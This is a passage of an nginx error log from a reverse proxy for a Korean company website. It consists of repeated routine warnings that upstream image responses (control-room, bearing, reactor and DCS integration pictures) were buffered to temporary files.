/var/cache/nginx/proxy_temp/2/04/0000011042 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:10:04 [warn] 901#901: *40624 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/04/0000011043 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:15:43 [warn] 901#901: *40654 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/04/0000011044 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:15:43 [warn] 901#901: *40654 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/04/0000011045 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:19:50 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/04/0000011046 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/04/0000011047 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/04/0000011048 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:20:11 [warn] 901#901: *40670 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/04/0000011049 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000011050 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000011051 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:44:11 [warn] 895#895: *40774 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/05/0000011052 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:47:29 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/05/0000011053 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:47:29 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/05/0000011054 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:47:51 [warn] 895#895: *40789 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/05/0000011055 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/05/0000011056 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/05/0000011057 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 03:51:23 [warn] 895#895: *40838 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/05/0000011058 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/05/0000011059 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/06/0000011060 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 04:13:45 [warn] 895#895: *40863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/06/0000011061 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/54/0000012548 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/54/0000012549 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 07:16:11 [warn] 906#906: *43990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/55/0000012550 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/06/0000014068 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/06/0000014069 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 13:36:35 [warn] 920#920: *50503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/07/0000014070 while reading upstream, client: 211.234.204.1, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 21:56:56 [warn] 932#932: *92717 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/93/0000015936 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/93/0000015937 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/93/0000015938 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:39:23 [warn] 933#933: *92799 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/93/0000015939 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:51:14 [warn] 933#933: *92816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/94/0000015940 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:56:48 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/94/0000015941 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:56:59 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/94/0000015942 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:56:59 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/94/0000015943 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 22:57:00 [warn] 933#933: *92832 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/94/0000015944 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/94/0000015945 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/94/0000015946 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/94/0000015947 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:00:54 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/94/0000015948 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:01:25 [warn] 933#933: *92861 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/94/0000015949 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:04:42 [warn] 933#933: *92893 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/95/0000015950 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:04:42 [warn] 933#933: *92893 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/95/0000015951 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:13:02 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/95/0000015952 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:13:02 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/95/0000015953 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:13:03 [warn] 933#933: *92911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/95/0000015954 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:18:32 [warn] 933#933: *92968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/95/0000015955 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:18:32 [warn] 933#933: *92968 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/95/0000015956 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/95/0000015957 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/95/0000015958 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:21:50 [warn] 933#933: *92984 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/95/0000015959 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:30:07 [warn] 933#933: *93013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/96/0000015960 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:30:07 [warn] 933#933: *93013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/96/0000015961 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/96/0000015962 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/96/0000015963 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:38:40 [warn] 933#933: *93034 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/96/0000015964 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:43:40 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/96/0000015965 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:43:46 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/96/0000015966 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:43:50 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/96/0000015967 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:44:00 [warn] 935#935: *93065 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/96/0000015968 while reading upstream, client: 74.7.243.250, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/96/0000015969 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/97/0000015970 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/97/0000015971 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:48:36 [warn] 935#935: *93080 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/97/0000015972 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000015973 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000015974 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:50:58 [warn] 935#935: *93095 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/97/0000015975 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:53:17 [warn] 935#935: *93110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/97/0000015976 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/17 23:53:17 [warn] 935#935: *93110 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/97/0000015977 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000015978 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/97/0000015979 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:06:15 [warn] 939#939: *93130 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/98/0000015980 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" -2026/02/18 00:08:48 [warn] 943#943: *93146 an upstream response is buffered to a temporary file 